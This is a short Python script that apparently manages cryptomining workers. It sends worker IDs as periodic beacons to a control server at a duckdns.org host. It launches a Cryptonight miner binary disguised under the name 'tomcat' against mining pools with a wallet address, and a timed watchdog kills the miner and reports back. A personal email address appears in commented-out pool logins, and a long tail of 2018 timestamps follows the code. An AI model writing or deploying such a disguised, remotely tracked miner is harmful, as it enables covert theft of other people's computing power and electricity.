import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:01.478188
#2018-02-17 17:27:06.109791
#2018-02-17 19:17:06.257776
#2018-02-17 21:07:04.351125
#2018-02-17 22:51:04.181248
#2018-02-18 00:36:08.137438
#2018-02-18 02:26:06.320040
#2018-02-18 04:13:03.584897
#2018-02-18 06:03:07.447029
#2018-02-18 07:54:07.835160
#2018-02-18 09:43:03.976112
#2018-02-18 11:28:06.924051
#2018-02-18 13:14:05.820633
#2018-02-18 15:04:04.221716
#2018-02-18 16:52:05.332952
#2018-02-18 18:39:07.300696
#2018-02-18 20:27:06.386471
#2018-02-18 22:13:07.309820
#2018-02-19 00:03:05.981801
#2018-02-19 01:48:01.339350
#2018-02-19 03:35:08.899840
#2018-02-19 05:20:08.983758
#2018-02-19 07:08:07.234286
#2018-02-19 08:57:04.718683
#2018-02-19 10:47:01.844916
#2018-02-19 12:35:09.445721
#2018-02-19 14:22:01.751989
#2018-02-19 16:09:06.317083
#2018-02-19 17:56:07.734029
#2018-02-19 19:43:06.424720
#2018-02-19 21:32:06.511444
#2018-02-19 23:19:08.422478
#2018-02-20 01:05:07.810254
#2018-02-20 02:56:08.873980
#2018-02-20 04:44:06.720154
#2018-02-20 06:28:01.600547
#2018-02-20 08:12:07.828641
#2018-02-20 09:57:07.695718
#2018-02-20 11:41:09.922549
#2018-02-20 13:28:07.197631
#2018-02-20 15:14:06.331141
#2018-02-20 17:01:09.159981
#2018-02-20 18:49:11.548797
#2018-02-20 20:35:08.478230
#2018-02-20 22:19:08.099367
#2018-02-21 00:02:06.274878
#2018-02-21 01:47:03.868458
#2018-02-21 03:35:08.134409
#2018-02-21 05:24:01.765868
#2018-02-21 07:11:05.689282
#2018-02-21 08:58:07.675606
#2018-02-21 10:47:04.351655
#2018-02-21 12:35:01.454938
#2018-02-21 14:22:01.946002
#2018-02-21 16:09:09.595281
#2018-02-21 17:59:07.929609
#2018-02-21 19:46:04.579603
#2018-02-21 21:33:08.462981
#2018-02-21 23:21:08.237582
#2018-02-22 01:10:03.878692
#2018-02-22 02:57:06.587452
#2018-02-22 04:44:01.965441
#2018-02-22 06:28:06.027791
#2018-02-22 08:15:07.683039
#2018-02-22 10:03:08.017657
#2018-02-22 11:46:11.987611
#2018-02-22 13:33:04.917770
#2018-02-22 15:22:07.359236
#2018-02-22 17:07:01.660040
#2018-02-22 18:53:01.724132
#2018-02-22 20:45:06.994471
#2018-02-22 22:30:10.377771
#2018-02-23 00:15:08.764785
#2018-02-23 02:03:01.292527
#2018-02-23 03:51:05.738467
#2018-02-23 05:43:05.543294
#2018-02-23 07:28:04.163061
#2018-02-23 09:32:06.869634
#2018-02-23 11:38:08.722280
#2018-02-23 13:27:07.239745
#2018-02-23 15:13:02.089194
#2018-02-23 17:03:01.752706
#2018-02-23 18:50:10.146355
#2018-02-23 20:38:05.764220
#2018-02-23 22:25:07.797363
#2018-02-24 00:10:09.596398
#2018-02-24 02:02:07.202637
#2018-02-24 03:54:04.201137
#2018-02-24 05:41:05.631742
#2018-02-24 07:32:06.606786
#2018-02-24 09:18:07.728833
#2018-02-24 11:14:05.675450
#2018-02-24 13:03:01.874114
#2018-02-24 14:50:06.178581
#2018-02-24 16:42:08.069542
#2018-02-24 18:30:09.227640
#2018-02-24 20:16:03.405414
#2018-02-24 23:47:01.662642
#2018-02-25 03:41:06.554383
#2018-02-25 07:26:05.984938